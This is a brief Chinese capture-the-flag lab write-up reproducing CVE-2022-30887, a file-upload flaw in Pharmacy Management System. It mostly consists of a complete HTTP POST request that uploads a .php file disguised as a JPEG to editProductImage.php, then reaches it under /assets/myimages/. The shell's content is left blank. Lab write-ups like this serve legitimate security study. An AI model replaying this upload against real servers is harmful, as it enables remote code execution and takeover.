春秋云镜CVE-2022-30887 Pharmacy Management System shell upload漏洞复现

在打开页面之后进行刷新并且进行抓包，将数据包替换为如下数据包

POST /php_action/editProductImage.php?id=1 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------208935235035266125502673738631
Content-Length: 556
Connection: close
Cookie: PHPSESSID=t1jo541l52f76t9upiu0pbqv0c
Upgrade-Insecure-Requests: 1

-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="old_image"


-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="productImage"; filename="xxx.php"
Content-Type: image/jpeg




-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="btn"


-----------------------------208935235035266125502673738631--
————————————————

直接使用此数据包进行文件传输查看是否可以成功上传success

这样子就表示文件成功上传了

进行页面访问 ip:port/assets/myimages/文件名

 

成功拿到flag